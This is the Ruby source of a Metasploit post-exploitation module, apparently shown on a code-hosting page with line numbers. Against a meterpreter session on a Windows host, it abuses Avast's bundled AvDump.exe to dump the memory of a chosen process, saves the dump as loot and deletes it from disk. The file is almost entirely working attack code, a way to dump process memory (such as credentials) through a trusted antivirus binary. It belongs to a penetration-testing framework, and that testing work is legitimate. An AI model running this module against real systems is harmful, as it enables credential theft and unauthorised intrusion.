Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'rbconfig'
7

8
class MetasploitModule < Msf::Post
9
  include Msf::Post::File
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Avast AV Memory Dumping Utility',
16
        'Description' => %q{
17
          This module leverages an Avast Anti-Virus memory dump utility that is shipped
18
          by default with Avast Anti-Virus Home software suite.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [ 'DLL_Cool_J' ],
22
        'Platform' => [ 'win'],
23
        'SessionTypes' => [ 'meterpreter'],
24
        'Notes' => {
25
          'Stability' => [CRASH_SAFE],
26
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
27
          'Reliability' => []
28
        }
29
      )
30
    )
31

32
    register_options([
33
      OptString.new('PID', [true, 'specify pid to dump' ]),
34
      OptString.new('DUMP_PATH', [true, 'specify location to write dump file to', 'C:\\Users\\Public\\tmp.dmp'])
35
    ])
36
  end
37

38
  def avdump
39
    avdump_paths = [
40
      'Avast\\AvDump.exe',
41
      'BreachGuard\\AvDump.exe',
42
      'Cleanup\\AvDump.exe',
43
      'Driver Updater\\AvDump.exe',
44
      'SecureLine VPN\\AvDump.exe'
45
    ]
46

47
    base = expand_path('%PROGRAMFILES%\\Avast Software\\')
48
    avdump_paths.each do |p|
49
      if file_exist?(base + p.to_s)
50
        return base + p.to_s
51
      end
52
    end
53
  end
54

55
  def run
56
    fail_with(Failure::NotVulnerable, 'AvDump.exe does not exist on target.') unless avdump
57
    print_status('AvDump.exe exists!')
58

59
    dump_path = datastore['DUMP_PATH']
60
    pid = datastore['PID'].to_s
61

62
    print_status("Executing Avast memory dumping utility (#{avdump}) against pid #{pid} writing to #{dump_path}")
63
    result = cmd_exec("#{avdump} --pid #{pid} --exception_ptr 0 --thread_id 0 --dump_file \"#{dump_path}\" --min_interval 0")
64

65
    fail_with(Failure::Unknown, "Dump file #{dump_path} was not created") unless file_exist?(dump_path)
66
    print_status(dump_path)
67
    mem_file = read_file(dump_path)
68
    store_loot('host.avast.memdump', 'binary/db', session, mem_file)
69

70
    print_status(result)
71
    rm_f(dump_path)
72
  end
73
end
74

75